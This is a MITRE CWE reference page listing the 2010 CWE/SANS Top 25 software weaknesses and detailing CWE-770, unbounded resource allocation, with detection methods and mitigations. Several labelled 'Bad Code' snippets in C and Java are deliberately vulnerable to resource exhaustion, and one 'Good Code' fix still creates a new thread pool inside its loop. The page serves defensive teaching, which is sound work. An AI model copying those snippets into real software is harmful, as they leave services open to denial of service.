CWE

Common Weakness Enumeration

A Community-Developed List of Software Weakness Types

CWE/SANS Top 25 Most Dangerous Software Errors
Home > CWE List > VIEW SLICE: CWE-800: Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (2.11)  
ID

CWE VIEW: Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors

View ID: 800
Structure: Graph
Status: Incomplete
Presentation Filter:
+ View Data

View Objective

CWE entries in this view (graph) are listed in the 2010 CWE/SANS Top 25 Programming Errors.

+ View Audience
StakeholderDescription
Developers

By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software.

Software_Customers

If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim.

Educators

Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25.

+ Relationships
Show Details:
800 - Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors
+CategoryCategory2010 Top 25 - Insecure Interaction Between Components - (801)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components)
Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2010 CWE/SANS Top 25 Programming Errors.
*Weakness ClassWeakness ClassConcurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') - (362)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 362 (Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition'))
The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.
+Compound Element: CompositeCompound Element: CompositeCross-Site Request Forgery (CSRF) - (352)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 352 (Cross-Site Request Forgery (CSRF))
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.Session RidingCross Site Reference ForgeryXSRF
*Weakness ClassWeakness ClassExternal Control of Critical State Data - (642)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 352 (Cross-Site Request Forgery (CSRF)) > 642 (External Control of Critical State Data)
The software stores security-critical state information about its users, or the software itself, in a location that is accessible to unauthorized actors.
*Weakness BaseWeakness BaseInsufficient Session Expiration - (613)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 352 (Cross-Site Request Forgery (CSRF)) > 613 (Insufficient Session Expiration)
According to WASC, "Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."
*Weakness BaseWeakness BaseOrigin Validation Error - (346)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 352 (Cross-Site Request Forgery (CSRF)) > 346 (Origin Validation Error)
The software does not properly verify that the source of data or communication is valid.
*Weakness ClassWeakness ClassUnintended Proxy or Intermediary ('Confused Deputy') - (441)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 352 (Cross-Site Request Forgery (CSRF)) > 441 (Unintended Proxy or Intermediary ('Confused Deputy'))
The software receives a request, message, or directive from an upstream component, but the software does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the software's control sphere. This causes the software to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.Confused Deputy
*Weakness BaseWeakness BaseImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - (79)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.XSSCSS
*Weakness BaseWeakness BaseImproper Neutralization of Special Elements used in an OS Command ('OS Command Injection') - (78)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 78 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))
The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.Shell injectionShell metacharacters
*Weakness BaseWeakness BaseImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - (89)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
*Weakness BaseWeakness BaseInformation Exposure Through an Error Message - (209)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 209 (Information Exposure Through an Error Message)
The software generates an error message that includes sensitive information about its environment, users, or associated data.
*Weakness VariantWeakness VariantURL Redirection to Untrusted Site ('Open Redirect') - (601)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 601 (URL Redirection to Untrusted Site ('Open Redirect'))
A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.Open RedirectCross-site RedirectCross-domain Redirect
*Weakness BaseWeakness BaseUnrestricted Upload of File with Dangerous Type - (434)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 801 (2010 Top 25 - Insecure Interaction Between Components) > 434 (Unrestricted Upload of File with Dangerous Type)
The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment.Unrestricted File Upload
+CategoryCategory2010 Top 25 - Porous Defenses - (803)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses)
Weaknesses in this category are listed in the "Porous Defenses" section of the 2010 CWE/SANS Top 25 Programming Errors.
*Weakness ClassWeakness ClassImproper Authorization - (285)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 285 (Improper Authorization)
The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.AuthZ
*Weakness ClassWeakness ClassIncorrect Permission Assignment for Critical Resource - (732)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 732 (Incorrect Permission Assignment for Critical Resource)
The software specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
*Weakness VariantWeakness VariantMissing Authentication for Critical Function - (306)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 306 (Missing Authentication for Critical Function)
The software does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources.
*Weakness BaseWeakness BaseMissing Encryption of Sensitive Data - (311)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 311 (Missing Encryption of Sensitive Data)
The software does not encrypt sensitive or critical information before storage or transmission.
*Weakness BaseWeakness BaseReliance on Untrusted Inputs in a Security Decision - (807)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 807 (Reliance on Untrusted Inputs in a Security Decision)
The application uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.
*Weakness BaseWeakness BaseUse of Hard-coded Credentials - (798)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 798 (Use of Hard-coded Credentials)
The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
*Weakness BaseWeakness BaseUse of a Broken or Risky Cryptographic Algorithm - (327)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 803 (2010 Top 25 - Porous Defenses) > 327 (Use of a Broken or Risky Cryptographic Algorithm)
The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.
+CategoryCategory2010 Top 25 - Risky Resource Management - (802)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management)
Weaknesses in this category are listed in the "Risky Resource Management" section of the 2010 CWE/SANS Top 25 Programming Errors.
*Weakness BaseWeakness BaseAllocation of Resources Without Limits or Throttling - (770)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 770 (Allocation of Resources Without Limits or Throttling)
The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on how many resources can be allocated, in violation of the intended security policy for that actor.
*Weakness BaseWeakness BaseBuffer Access with Incorrect Length Value - (805)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 805 (Buffer Access with Incorrect Length Value)
The software uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer.
*Weakness BaseWeakness BaseBuffer Copy without Checking Size of Input ('Classic Buffer Overflow') - (120)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))
The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.buffer overrunUnbounded Transfer
*Weakness BaseWeakness BaseDownload of Code Without Integrity Check - (494)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 494 (Download of Code Without Integrity Check)
The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.
*Weakness ClassWeakness ClassImproper Check for Unusual or Exceptional Conditions - (754)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 754 (Improper Check for Unusual or Exceptional Conditions)
The software does not check or improperly checks for unusual or exceptional conditions that are not expected to occur frequently during day to day operation of the software.
*Weakness BaseWeakness BaseImproper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') - (98)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 98 (Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion'))
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions.Remote file includeRFILocal file inclusion
*Weakness ClassWeakness ClassImproper Limitation of a Pathname to a Restricted Directory ('Path Traversal') - (22)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 22 (Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'))
The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.Directory traversalPath traversal
*Weakness BaseWeakness BaseImproper Validation of Array Index - (129)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 129 (Improper Validation of Array Index)
The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array. out-of-bounds array indexindex-out-of-rangearray index underflow
*Weakness BaseWeakness BaseIncorrect Calculation of Buffer Size - (131)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 131 (Incorrect Calculation of Buffer Size)
The software does not correctly calculate the size to be used when allocating a buffer, which could lead to a buffer overflow.
*Weakness BaseWeakness BaseInteger Overflow or Wraparound - (190)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 802 (2010 Top 25 - Risky Resource Management) > 190 (Integer Overflow or Wraparound)
The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.
+CategoryCategory2010 Top 25 - Weaknesses On the Cusp - (808)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp)
Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn.
*Weakness BaseWeakness BaseExposed Dangerous Method or Function - (749)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 749 (Exposed Dangerous Method or Function)
The software provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.
*Weakness BaseWeakness BaseExternal Initialization of Trusted Variables or Data Stores - (454)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 454 (External Initialization of Trusted Variables or Data Stores)
The software initializes critical internal variables or data stores using inputs that can be modified by untrusted actors.
*Weakness BaseWeakness BaseGuessable CAPTCHA - (804)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 804 (Guessable CAPTCHA)
The software uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor.
*Weakness ClassWeakness ClassImproper Control of Interaction Frequency - (799)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 799 (Improper Control of Interaction Frequency)
The software does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.Insufficient anti-automationBrute force
*Weakness BaseWeakness BaseImproper Cross-boundary Removal of Sensitive Data - (212)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 212 (Improper Cross-boundary Removal of Sensitive Data)
The software uses a resource that contains sensitive data, but it does not properly remove that data before it stores, transfers, or shares the resource with actors in another control sphere.
*Weakness BaseWeakness BaseImproper Link Resolution Before File Access ('Link Following') - (59)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 59 (Improper Link Resolution Before File Access ('Link Following'))
The software attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.insecure temporary file
*Weakness BaseWeakness BaseImproper Restriction of Excessive Authentication Attempts - (307)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 307 (Improper Restriction of Excessive Authentication Attempts)
The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more susceptible to brute force attacks.
*Weakness BaseWeakness BaseIncorrect Conversion between Numeric Types - (681)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 681 (Incorrect Conversion between Numeric Types)
When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.
*Weakness BaseWeakness BaseMissing Initialization of a Variable - (456)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 456 (Missing Initialization of a Variable)
The software does not initialize critical variables, which causes the execution environment to use unexpected values.
*Weakness BaseWeakness BaseMissing Release of Resource after Effective Lifetime - (772)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 772 (Missing Release of Resource after Effective Lifetime)
The software does not release a resource after its effective lifetime has ended, i.e., after the resource is no longer needed.
*Weakness BaseWeakness BaseNULL Pointer Dereference - (476)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 476 (NULL Pointer Dereference)
A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.
*Weakness BaseWeakness BaseOperation on a Resource after Expiration or Release - (672)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 672 (Operation on a Resource after Expiration or Release)
The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.
+Compound Element: CompositeCompound Element: CompositeUntrusted Search Path - (426)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 426 (Untrusted Search Path)
The application searches for critical resources using an externally-supplied search path that can point to resources that are not under the application's direct control.Untrusted Path
*Weakness ClassWeakness ClassContainment Errors (Container Errors) - (216)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 426 (Untrusted Search Path) > 216 (Containment Errors (Container Errors))
This tries to cover various problems in which improper data are included within a "container."
*Weakness BaseWeakness BaseModification of Assumed-Immutable Data (MAID) - (471)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 426 (Untrusted Search Path) > 471 (Modification of Assumed-Immutable Data (MAID))
The software does not properly protect an assumed-immutable element from being modified by an attacker.
*CategoryCategoryPermission Issues - (275)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 426 (Untrusted Search Path) > 275 (Permission Issues)
Weaknesses in this category are related to improper assignment or handling of permissions.
*Weakness BaseWeakness BaseUse After Free - (416)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 416 (Use After Free)
Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.Dangling pointerUse-After-Free
*Weakness BaseWeakness BaseUse of Externally-Controlled Format String - (134)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 134 (Use of Externally-Controlled Format String)
The software uses a function that accepts a format string as an argument, but the format string originates from an external source.
*Weakness ClassWeakness ClassUse of Insufficiently Random Values - (330)
800 (Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors) > 808 (2010 Top 25 - Weaknesses On the Cusp) > 330 (Use of Insufficiently Random Values)
The software may use insufficiently random numbers or values in a security context that depends on unpredictable numbers.
+ References
"2010 CWE/SANS Top 25 Most Dangerous Programming Errors". 2010-02-04. <http://cwe.mitre.org/top25>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
2010-01-15Internal CWE Team
+ View Metrics
CWEs in this viewTotal CWEs
Total45out of1006
Views0out of33
Categories4out of245
Weaknesses39out of720
Compound_Elements2out of8
View Components
View Components
A | B | C | D | E | F | G | H | I | J | K | L | M | N | O | P | Q | R | S | T | U | V | W | X | Y | Z

CWE-770: Allocation of Resources Without Limits or Throttling

Weakness ID: 770
Abstraction: Base
Status: Incomplete
Presentation Filter:
+ Description

Description Summary

The software allocates a reusable resource or group of resources on behalf of an actor without imposing any restrictions on how many resources can be allocated, in violation of the intended security policy for that actor.
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
  • System Configuration
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Availability

Technical Impact: DoS: resource consumption (CPU); DoS: resource consumption (memory); DoS: resource consumption (other)

When allocating resources without limits, an attacker could prevent other systems, applications, or processes from accessing the same type of resource.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Manual Static Analysis

Manual static analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. If denial-of-service is not considered a significant risk, or if there is strong emphasis on consequences such as code execution, then manual analysis may not focus on this weakness at all.

Fuzzing

While fuzzing is typically geared toward finding low-level implementation bugs, it can inadvertently find uncontrolled resource allocation problems. This can occur when the fuzzer generates a large number of test cases but does not restart the targeted software in between test cases. If an individual test case produces a crash, but it does not do so reliably, then an inability to limit resource allocation may be the cause.

When the allocation is directly affected by numeric inputs, then fuzzing may produce indications of this weakness.

Effectiveness: Opportunistic

Automated Dynamic Analysis

Certain automated dynamic analysis techniques may be effective in producing side effects of uncontrolled resource allocation problems, especially with resources such as processes, memory, and connections. The technique may involve generating a large number of requests to the software within a short time frame. Manual analysis is likely required to interpret the results.

Automated Static Analysis

Specialized configuration or tuning may be required to train automated tools to recognize this weakness.

Automated static analysis typically has limited utility in recognizing unlimited allocation problems, except for the missing release of program-independent system resources such as files, sockets, and processes, or unchecked arguments to memory. For system resources, automated static analysis may be able to detect circumstances in which resources are not released after they have expired, or if too much of a resource is requested at once, as can occur with memory. Automated analysis of configuration files may be able to detect settings that do not specify a maximum value.

Automated static analysis tools will not be appropriate for detecting exhaustion of custom resources, such as an intended security policy in which a bulletin board user is only allowed to make a limited number of posts per day.

+ Demonstrative Examples

Example 1

This code allocates a socket and forks each time it receives a new connection.

(Bad Code)
Example Languages: C and C++ 
sock=socket(AF_INET, SOCK_STREAM, 0);
while (1) {
newsock=accept(sock, ...);
printf("A connection has been accepted\n");
pid = fork();
}

The program does not track how many connections have been made, and it does not limit the number of connections. Because forking is a relatively expensive operation, an attacker would be able to cause the system to run out of CPU, processes, or memory by making a large number of connections. Alternatively, an attacker could consume all available connections, preventing others from accessing the system remotely.

Example 2

In the following example a server socket connection is used to accept a request to store data on the local file system using a specified filename. The method openSocketConnection establishes a server socket to accept requests from a client. When a client establishes a connection to this service the getNextMessage method is first used to retrieve from the socket the name of the file to store the data, the openFileToWrite method will validate the filename and open a file to write to on the local file system. The getNextMessage is then used within a while loop to continuously read data from the socket and output the data to the file until there is no longer any data from the socket.

(Bad Code)
Example Languages: C and C++ 
int writeDataFromSocketToFile(char *host, int port)
{

char filename[FILENAME_SIZE];
char buffer[BUFFER_SIZE];
int socket = openSocketConnection(host, port);

if (socket < 0) {
printf("Unable to open socket connection");
return(FAIL);
}
if (getNextMessage(socket, filename, FILENAME_SIZE) > 0) {
if (openFileToWrite(filename) > 0) {
while (getNextMessage(socket, buffer, BUFFER_SIZE) > 0){
if (!(writeToFile(buffer) > 0))
break;
}
}
closeFile();
}
closeSocket(socket);
}

This example creates a situation where data can be dumped to a file on the local file system without any limits on the size of the file. This could potentially exhaust file or disk resources and/or limit other clients' ability to access the service.

Example 3

In the following example, the processMessage method receives a two dimensional character array containing the message to be processed. The two-dimensional character array contains the length of the message in the first character array and the message body in the second character array. The getMessageLength method retrieves the integer value of the length from the first character array. After validating that the message length is greater than zero, the body character array pointer points to the start of the second character array of the two-dimensional character array and memory is allocated for the new body character array.

(Bad Code)
Example Languages: C and C++ 
/* process message accepts a two-dimensional character array of the form [length][body] containing the message to be processed */
int processMessage(char **message)
{
char *body;

int length = getMessageLength(message[0]);

if (length > 0) {
body = &message[1][0];
processMessageBody(body);
return(SUCCESS);
}
else {
printf("Unable to process message; invalid message length");
return(FAIL);
}
}

This example creates a situation where the length of the body character array can be very large and will consume excessive memory, exhausting system resources. This can be avoided by restricting the length of the second character array with a maximum length check

Also, consider changing the type from 'int' to 'unsigned int', so that you are always guaranteed that the number is positive. This might not be possible if the protocol specifically requires allowing negative values, or if you cannot control the return value from getMessageLength(), but it could simplify the check to ensure the input is positive, and eliminate other errors such as signed-to-unsigned conversion errors (CWE-195) that may occur elsewhere in the code.

(Good Code)
Example Languages: C and C++ 
unsigned int length = getMessageLength(message[0]);
if ((length > 0) && (length < MAX_LENGTH)) {...}

Example 4

In the following example, a server object creates a server socket and accepts client connections to the socket. For every client connection to the socket a separate thread object is generated using the ClientSocketThread class that handles request made by the client through the socket.

(Bad Code)
Example Language: Java 
public void acceptConnections() {

try {
ServerSocket serverSocket = new ServerSocket(SERVER_PORT);
int counter = 0;
boolean hasConnections = true;
while (hasConnections) {
Socket client = serverSocket.accept();
Thread t = new Thread(new ClientSocketThread(client));
t.setName(client.getInetAddress().getHostName() + ":" + counter++);
t.start();
}
serverSocket.close();

} catch (IOException ex) {...}
}

In this example there is no limit to the number of client connections and client threads that are created. Allowing an unlimited number of client connections and threads could potentially overwhelm the system and system resources.

The server should limit the number of client connections and the client threads that are created. This can be easily done by creating a thread pool object that limits the number of threads that are generated.

(Good Code)
Example Language: Java 
public static final int SERVER_PORT = 4444;
public static final int MAX_CONNECTIONS = 10;
...

public void acceptConnections() {

try {
ServerSocket serverSocket = new ServerSocket(SERVER_PORT);
int counter = 0;
boolean hasConnections = true;
while (hasConnections) {
hasConnections = checkForMoreConnections();
Socket client = serverSocket.accept();
Thread t = new Thread(new ClientSocketThread(client));
t.setName(client.getInetAddress().getHostName() + ":" + counter++);
ExecutorService pool = Executors.newFixedThreadPool(MAX_CONNECTIONS);
pool.execute(t);
}
serverSocket.close();

} catch (IOException ex) {...}
}

Example 5

An unnamed web site allowed a user to purchase tickets for an event. A menu option allowed the user to purchase up to 10 tickets, but the back end did not restrict the actual number of tickets that could be purchased.

Example 5 References:

Rafal Los. "Real-Life Example of a 'Business Logic Defect' (Screen Shots!)". 2011. <http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/Real-Life-Example-of-a-Business-Logic-Defect-Screen-Shots/ba-p/22581>.
+ Observed Examples
ReferenceDescription
Language interpreter does not restrict the number of temporary files being created when handling a MIME request with a large number of parts..
Driver does not use a maximum width when invoking sscanf style functions, causing stack consumption.
Large integer value for a length property in an object causes a large amount of memory allocation.
Product allows exhaustion of file descriptors when processing a large number of TCP packets.
Communication product allows memory consumption with a large number of SIP requests, which cause many sessions to be created.
Product allows attackers to cause a denial of service via a large number of directives, each of which opens a separate window.
CMS does not restrict the number of searches that can occur simultaneously, leading to resource exhaustion.
+ Potential Mitigations

Phase: Requirements

Clearly specify the minimum and maximum expectations for capabilities, and dictate which behaviors are acceptable when resource allocation reaches limits.

Phase: Architecture and Design

Limit the amount of resources that are accessible to unprivileged users. Set per-user limits for resources. Allow the system administrator to define these limits. Be careful to avoid CWE-410.

Phase: Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place, and it will help the administrator to identify who is committing the abuse. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

This will only be applicable to cases where user input can influence the size or frequency of resource allocations.

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Architecture and Design

Mitigation of resource exhaustion attacks requires that the target system either:

  • recognizes the attack and denies that user further access for a given amount of time, typically by using increasing time delays

  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.

The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, he may be able to prevent the user from accessing the server in question.

The second solution can be difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply requires more resources on the part of the attacker.

Phase: Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Phases: Architecture and Design; Implementation

If the program must fail, ensure that it fails gracefully (fails closed). There may be a temptation to simply let the program fail poorly in cases such as low memory conditions, but an attacker may be able to assert control before the software has fully exited. Alternately, an uncontrolled failure could cause cascading problems with other downstream components; for example, the program could send a signal to a downstream process so the process immediately knows that a problem has occurred and has a better chance of recovery.

Ensure that all failures in resource allocation place the system into a safe posture.

Phases: Operation; Architecture and Design

Strategy: Limit Resource Consumption

Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems.

